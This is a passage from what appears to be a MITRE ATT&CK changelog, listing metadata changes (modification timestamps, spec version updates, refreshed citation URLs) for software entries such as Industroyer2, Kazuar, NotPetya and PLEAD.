| modified | 2023-03-22 04:45:42.926000+00:00 | 2025-04-16 20:38:38.400000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S1072] Industroyer2
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-06 22:00:22.774000+00:00 | 2025-04-16 20:38:14.728000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0259] InnaputRAT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-20 02:21:24.856000+00:00 | 2025-04-16 20:38:34.903000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0260] InvisiMole
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-11-29 12:41:28.009000+00:00 | 2025-04-16 20:38:05.140000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0231] Invoke-PSImage
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-18 22:02:48.228000+00:00 | 2025-04-16 20:38:55.222000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0015] Ixeshe
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-20 22:45:06.494000+00:00 | 2024-11-17 16:12:58.245000+00:00 |
| external_references[1]['description'] | Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 12, 2014. | Moran, N., & Villeneuve, N. (2013, August 12). Survival of the Fittest: New York Times Attackers Evolve Quickly [Blog]. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html | https://web.archive.org/web/20191224162418/https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0389] JCry
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:51:27.312000+00:00 | 2025-04-16 20:38:29.735000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0044] JHUHUGIT
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 01:49:50.568000+00:00 | 2024-11-17 14:43:38.591000+00:00 |
| external_references[8]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
| external_references[8]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
[S0201] JPIN
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-08-11 19:44:31.363000+00:00 | 2025-04-16 20:38:38.557000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0648] JSS Loader
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 19:57:14.998000+00:00 | 2025-04-16 20:38:43.545000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0528] Javali
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-12-22 21:07:41.508000+00:00 | 2025-04-16 20:38:13.353000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0215] KARAE
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:52:22.775000+00:00 | 2024-11-17 15:01:33.386000+00:00 |
| external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0271] KEYMARBLE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:53:14.872000+00:00 | 2025-04-16 20:37:56.418000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0669] KOCTOPUS
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 04:47:58.740000+00:00 | 2024-11-17 14:12:07.295000+00:00 |
| external_references[2]['description'] | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf | https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0156] KOMPROGO
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:53:45.307000+00:00 | 2025-04-16 20:38:19.228000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1075] KOPILUWAK
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-07-25 20:02:07.578000+00:00 | 2025-04-16 20:37:54.797000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0088] Kasidet
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:54:23.238000+00:00 | 2025-04-16 20:37:58.992000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0265] Kazuar
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-12-02 21:20:50.906000+00:00 | 2025-04-16 20:38:07.739000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0585] Kerrdown
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 21:53:54.011000+00:00 | 2025-04-16 20:38:21.498000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0599] Kinsing
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-26 16:39:07.873000+00:00 | 2025-04-16 20:38:37.411000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0437] Kivars
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-03 20:19:34.935000+00:00 | 2025-04-16 20:38:31.015000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0250] Koadic
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-27 18:36:30.831000+00:00 | 2024-11-17 14:12:07.296000+00:00 |
| external_references[2]['description'] | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 24, 2021. | Jazi, H. (2021, February). LazyScripter: From Empire to double RAT. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf | https://web.archive.org/web/20211003035156/https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf |
[S0641] Kobalos
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-25 17:16:21.187000+00:00 | 2025-04-16 20:38:25.723000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0162] Komplex
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:55:54.637000+00:00 | 2025-04-16 20:38:42.776000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0042] LOWBALL
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:56:27.375000+00:00 | 2025-04-16 20:37:59.992000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0211] Linfo
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-01-06 19:32:28.394000+00:00 | 2024-11-17 19:55:07.593000+00:00 |
| external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0362] Linux Rabbit
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-12-22 15:46:17.965000+00:00 | 2025-04-16 20:37:56.120000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0513] LiteDuke
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-04 15:34:14.458000+00:00 | 2025-04-16 20:38:24.381000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0680] LitePower
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-16 20:36:35.449000+00:00 | 2025-04-16 20:38:22.811000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0681] Lizar
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 11:40:31.460000+00:00 | 2025-04-16 20:38:44.147000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0397] LoJax
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:57:58.594000+00:00 | 2025-04-16 20:38:32.158000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0447] Lokibot
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-11 17:43:38.029000+00:00 | 2025-04-16 20:38:35.363000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0582] LookBack
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-26 13:29:32.449000+00:00 | 2025-04-16 20:38:35.052000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0121] Lslsass
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:59:48.036000+00:00 | 2025-04-16 20:38:50.784000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0532] Lucifer
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-01 20:33:55.926000+00:00 | 2025-04-16 20:38:08.548000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0010] Lurid
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-31 12:39:16.608000+00:00 | 2025-04-16 20:37:58.843000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0500] MCMD
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-29 19:48:28.725000+00:00 | 2025-04-16 20:38:54.178000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0443] MESSAGETAP
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-24 01:43:11.282000+00:00 | 2025-04-16 20:38:26.051000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0233] MURKYTOP
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:00:19.828000+00:00 | 2025-04-16 20:37:52.514000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0282] MacSpy
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:00:58.813000+00:00 | 2025-04-16 20:38:44.003000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0409] Machete
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 04:52:58.843000+00:00 | 2025-04-16 20:38:02.252000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0652] MarkiRAT
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-25 14:24:59.957000+00:00 | 2025-04-16 20:38:07.387000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0167] Matryoshka
Current version: 2.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-23 20:13:32.050000+00:00 | 2024-11-17 12:44:07.639000+00:00 |
| external_references[3]['description'] | Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017. | Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf | https://cdn2.hubspot.net/hubfs/1903456/Whitepapers/CopyKittens.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0449] Maze
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-01-24 17:01:08.605000+00:00 | 2025-04-16 20:38:37.773000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0459] MechaFlounder
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-28 16:19:14.488000+00:00 | 2025-04-16 20:38:38.886000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0688] Meteor
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-14 15:48:23.444000+00:00 | 2025-04-16 20:38:37.573000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0179] MimiPenguin
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 16:57:34.776000+00:00 | 2025-04-16 20:38:52.183000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0051] MiniDuke
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-14 21:21:51.872000+00:00 | 2025-04-16 20:38:12.056000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0280] MirageFox
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-22 18:52:32.764000+00:00 | 2025-04-16 20:38:40.181000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0084] Mis-Type
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-30 20:04:42.419000+00:00 | 2025-04-16 20:38:39.359000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0083] Misdat
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-30 21:01:41.137000+00:00 | 2025-04-16 20:37:55.806000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0080] Mivast
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-20 20:09:46.802000+00:00 | 2025-04-16 20:38:45.394000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0079] MobileOrder
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:04.825000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0553] MoleNet
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-27 02:20:58.446000+00:00 | 2025-04-16 20:38:21.182000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1026] Mongall
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-24 18:53:41.304000+00:00 | 2025-04-16 20:38:16.324000+00:00 |
| x_mitre_attack_spec_version | 3.0.0 | 3.2.0 |
[S0149] MoonWind
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 19:57:17.490000+00:00 | 2025-04-16 20:38:27.217000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1047] Mori
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-17 14:42:30.109000+00:00 | 2025-04-16 20:38:19.542000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0699] Mythic
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-18 15:41:53.146000+00:00 | 2025-04-16 20:38:56.653000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0590] NBTscan
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-24 20:45:08.323000+00:00 | 2025-04-16 20:38:55.369000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0272] NDiskMonitor
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:07:15.145000+00:00 | 2025-04-16 20:38:36.313000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0034] NETEAGLE
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:07:46.499000+00:00 | 2024-11-17 15:05:25.106000+00:00 |
| external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0198] NETWIRE
Current version: 1.6
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-20 20:04:20.149000+00:00 | 2025-04-16 20:38:00.152000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0353] NOKKI
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-18 15:22:32.747000+00:00 | 2025-04-16 20:37:53.448000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0205] Naid
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-01-06 19:32:28.371000+00:00 | 2024-11-17 19:55:07.588000+00:00 |
| external_references[3]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0637] NativeZone
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 02:03:14.543000+00:00 | 2025-04-16 20:38:31.174000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0247] NavRAT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-20 01:52:50.303000+00:00 | 2025-04-16 20:38:07.899000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0630] Nebulae
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 22:57:32.775000+00:00 | 2025-04-16 20:37:58.683000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0691] Neoichor
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-11 19:34:18.904000+00:00 | 2025-04-16 20:38:06.261000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0210] Nerex
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-01-06 19:32:28.182000+00:00 | 2024-11-17 19:55:07.591000+00:00 |
| external_references[2]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0056] Net Crawler
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-22 18:37:22.182000+00:00 | 2025-04-16 20:38:45.551000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0033] NetTraveler
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:11:38.961000+00:00 | 2024-11-17 18:04:41.738000+00:00 |
| external_references[1]['description'] | Kaspersky Lab's Global Research and Analysis Team. (n.d.). The NetTraveler (aka ‘Travnet’). Retrieved November 12, 2014. | Kaspersky Lab's Global Research and Analysis Team. (n.d.). The NetTraveler (aka ‘Travnet’). Retrieved November 17, 2024. |
| external_references[1]['url'] | http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf | https://web.archive.org/web/20160326004042/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0457] Netwalker
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 05:03:29.436000+00:00 | 2025-04-16 20:38:17.793000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0118] Nidiran
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 16:27:20.897000+00:00 | 2025-04-16 20:38:27.055000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0368] NotPetya
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:11:21.842000+00:00 | 2025-04-16 20:38:09.202000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0138] OLDBAIT
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-26 17:51:20.402000+00:00 | 2024-11-17 14:43:38.590000+00:00 |
| external_references[1]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0165] OSInfo
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-18 22:53:32.172000+00:00 | 2025-04-16 20:38:43.861000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0402] OSX/Shlayer
Current version: 1.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-30 16:28:36.699000+00:00 | 2025-04-16 20:38:42.935000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0644] ObliqueRAT
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 14:43:12.250000+00:00 | 2025-04-16 20:38:09.744000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0346] OceanSalt
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:12:48.823000+00:00 | 2025-04-16 20:37:59.147000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0340] Octopus
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-06 17:15:58.173000+00:00 | 2025-04-16 20:38:39.717000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0439] Okrum
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-14 21:17:53.756000+00:00 | 2025-04-16 20:38:05.946000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0365] Olympic Destroyer
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-23 19:32:38.936000+00:00 | 2025-04-16 20:38:01.435000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0052] OnionDuke
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-23 15:21:12.900000+00:00 | 2025-04-16 20:38:30.711000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0264] OopsIE
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 02:36:44.945000+00:00 | 2025-04-16 20:38:21.971000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0229] Orz
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-19 01:33:33.267000+00:00 | 2025-04-16 20:37:53.293000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0594] Out1
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-26 22:35:19.315000+00:00 | 2025-04-16 20:38:53.377000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0072] OwaAuth
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-06-17 19:03:17.306000+00:00 | 2025-04-16 20:38:28.901000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0598] P.A.S. Webshell
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-13 13:10:36.820000+00:00 | 2025-04-16 20:38:05.296000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0626] P8RAT
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-14 23:25:08.267000+00:00 | 2025-04-16 20:38:19.073000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0158] PHOREAL
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:15:03.862000+00:00 | 2025-04-16 20:38:43.708000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0254] PLAINTEE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 17:15:33.608000+00:00 | 2025-04-16 20:37:58.191000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0435] PLEAD
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-15 11:32:25.173000+00:00 | 2025-04-16 20:38:31.485000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0216] POORAIM
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
